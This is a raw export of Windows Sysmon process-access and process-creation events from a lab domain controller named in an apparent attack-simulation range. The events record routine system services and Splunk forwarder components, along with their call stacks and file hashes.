13:30:17.076{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012343Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:17.076{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012342Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:17.076{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4768-6000-2B05-000000009A01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000012341Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:17.076{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4768-6000-2B05-000000009A01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000012340Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:16.936{08A6967A-4768-6000-2B05-000000009A01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000012366Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:18.717{08A6967A-476A-6000-2D05-000000009A01}64486452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012365Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:18.560{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-476A-6000-2D05-000000009A01}6448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012364Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:18.560{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012363Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:18.560{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012362Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:18.560{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012361Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:18.560{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012360Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:18.560{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-476A-6000-2D05-000000009A01}6448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000012359Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:18.560{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-476A-6000-2D05-000000009A01}6448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000012358Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:18.561{08A6967A-476A-6000-2D05-000000009A01}6448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000012357Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:18.076{08A6967A-4769-6000-2C05-000000009A01}64046408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012356Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:18.029{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012381Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:19.545{08A6967A-476B-6000-2E05-000000009A01}64886492C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012380Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:19.435{08A6967A-4298-6000-2F00-000000009A01}22524764C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bc62|c:\windows\system32\tileobjserver.dll+26f22|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000012379Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:19.435{08A6967A-4298-6000-2F00-000000009A01}22524764C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|c:\windows\system32\tileobjserver.dll+bc0f|c:\windows\system32\tileobjserver.dll+26f22|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000012378Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:19.420{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012377Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:19.420{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012376Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:19.420{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012375Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:19.420{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012374Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:19.373{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-476B-6000-2E05-000000009A01}6488C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012373Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:19.373{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012372Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:19.373{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012371Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 